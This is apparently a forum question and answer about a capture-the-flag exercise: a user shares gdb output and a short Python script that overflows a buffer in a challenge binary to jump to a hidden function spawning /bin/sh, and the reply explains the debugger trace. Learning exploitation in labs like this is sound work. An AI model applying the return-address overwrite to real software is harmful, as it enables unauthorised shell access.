0

Sorry if this is the wrong format. Im currently doing a CTF and have a problem where i have to overflow a buffer, to get access to a /bin/sh hidden function, where i then can get a flag.

I think i successfully overflow the buffer, but when i would be getting access to the hidden function i get the following output.

[ Zerochain ]
1. Add Note
2. Delete Note
3. View Note
4. Vulnerable Log
5. Exit
Your choice: 
Breakpoint 1, 0x0000000000401570 in vulnerable_log ()
(gdb) x/xg $rbp
0x7fffffffdc30: 0x00007fffffffdc50
(gdb) c
Continuing.
Enter log message: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Breakpoint 2, 0x00000000004015b6 in hidden_shell ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7e045d4 in do_system (line=0x402113 "/bin/sh") at ../sysdeps/posix/system.c:148
warning: 148    ../sysdeps/posix/system.c: No such file or directory

Im using gdb to get information from the program.
I have also made the following python program to insert the different data.

import sys
from pwn import * 


padding = b"\x41" * (123+9)
return_adress = b"\x00\x00\x00\x00\x00\xb2\x15\x40"
sys.stdout.buffer.write("4".encode())
sys.stdout.buffer.write(padding+return_adress)

Hope someone can help. If you need more information feel free to ask, since i can both link the file and CTF-problem. Thanks Ahead!

Improve this question
1

1 Answer 1

Reset to default
0

This is probably a menu-driven program (called Zerochain) offering these options:

1. Add Note
2. Delete Note
3. View Note
4. Vulnerable Log
5. Exit

And here’s what's happening in your gdb session:

You triggered Breakpoint 1 at vulnerable_log():

Breakpoint 1, 0x0000000000401570 in vulnerable_log ()

You checked the base pointer (rbp), and it looks like it points to:

0x7fffffffdc30: 0x00007fffffffdc50

Then you continued (c), and entered a very long input for "Enter log message":

AAAAAAAAAA.... (lots of A's)

After that, you hit Breakpoint 2, this time inside hidden_shell():

Breakpoint 2, 0x00000000004015b6 in hidden_shell ()

That suggests your input redirected control flow to this hidden function!

Then you continued again, and the program ran do_system() with the command /bin/sh:

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7e045d4 in do_system (line=0x402113 "/bin/sh")

So the program was trying to execute a shell , before crashing.

Improve this answer
Sign up to request clarification or add additional context in comments.

Comments

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.